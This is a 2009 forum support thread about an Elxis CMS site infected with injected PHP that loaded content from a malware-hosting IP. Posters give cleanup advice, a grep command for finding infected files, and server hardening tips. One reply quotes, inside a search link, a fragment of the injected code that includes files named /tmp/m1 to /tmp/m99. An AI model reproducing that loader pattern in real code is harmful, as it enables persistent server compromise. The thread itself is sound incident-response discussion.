Elxis CMS Forum
Support => Security => Topic started by: Dr_Monkey on February 27, 2009, 16:36:59
-
I get the following message from google chrome when I goto my site:
Warning: Visiting this site may harm your computer!
The website at <sitename removed> contains elements from the site 78.110.175.21, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
Looks like a PDF is trying to be loaded. I don't have any PDF files on my site.
Not sure where to look to see how this malware is getting loaded.
Any ideas?
-
It probably for a virus on your server , The virus attached to your files ... php files , html files ...
This is a server issue ... not an Elxis matter ... :)
-
Contact with your hosting provider.
-
This is exactly what I mentioned , Contact your hosting provider and tell them to check the server for viruses ...
-
If you have access to ssh and shell , Try to find those files that attached with viruses by using this command :
find . -iname '*' | xargs grep 'Yahoo! Counter' -sl
PS: If you are using a Linux base server
-
The post with the code have been removed for security reasons.
-
Looks like a PDF is trying to be loaded. I don't have any PDF files on my site.
Not sure where to look to see how this malware is getting loaded.
Any ideas?
till your host provider check... is wise(and better of doing nothing) you to check your files in the server..
if no sell acces
start from writable files first like ...
Avatars , tmp , for strange names (do not delete anything if you are not sure)
or do something more easy... start from access and error log of your server and ftp logs
maybe the problem is in your folders maybe in other place on server....
**************
are you sure that you don't install 3rd party modules, templates, comportments, etc?
************
have you any kind of users uploads( check upload files)
etc.
-
I found some code in my index.php page that appears to create the script.
it defines a function using base64_decode. I created a test php page using echo base64_decode('blah'); where blah is the long encoded string to see what was being created.
Unfortunately when I browse the test php page Google Chrome gives me the same warning my real page has.
Any ideas on how to display the encoded string without going to the website?
This post is probably outside the scope of this subsection of the forum and is not directly related to elxis, so I will delete if inappropriate, but I am very curious about how this code works.
-
template's index.php?
use other browser!
can't you overwrite this suspicious index.php with the original? ... if it is hacked or in any case ... just to be sure!
use my profile ..... attach to zip and send me by email this index.php to see it....
if you want!
----------------------------------------------------------
edit: this guy send this to me .. look the screenshoot .... What the hell is this ...
i dont know anything like this in any elxis file!
which is this file? what index.php? in which elxis folder? Replace immediately
read first lines.. it is looking for files inside /tmp/.... so this octopus might have company out there!
Edit2 : see >> (http://www.google.gr/search?q=for(%24i%3D1%3B%24i%3C100%3B%24i%2B%2B)+if(is_file(%24f%3D%27%2Ftmp%2Fm%27.%24i)){include_once(%24f)%3B&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:el:official&client=firefox-a) you are not the only ...
if you sure that there is not your fault (permissions... etc) i think that you should have a small conversasion with your provider then replace all passwords and i hope you have taken a backup... because you are not sure what else might have done , to files , DB etc....!
[attachment deleted by admin]
-
Check your current register globals value , is it on ?
-
Thanks for all the help.
I have deleted all the files from my site and I am in the process of reinstalling elxis. I am thinking my FTP account got hacked because almost every PHP file was infected by malicious code. Time to change passwords.
-
Dr_Monkey I guess your server has register_globals ON. If, yes, tell your hosting provider to disable register_globals. Also disable allow_url_fopen.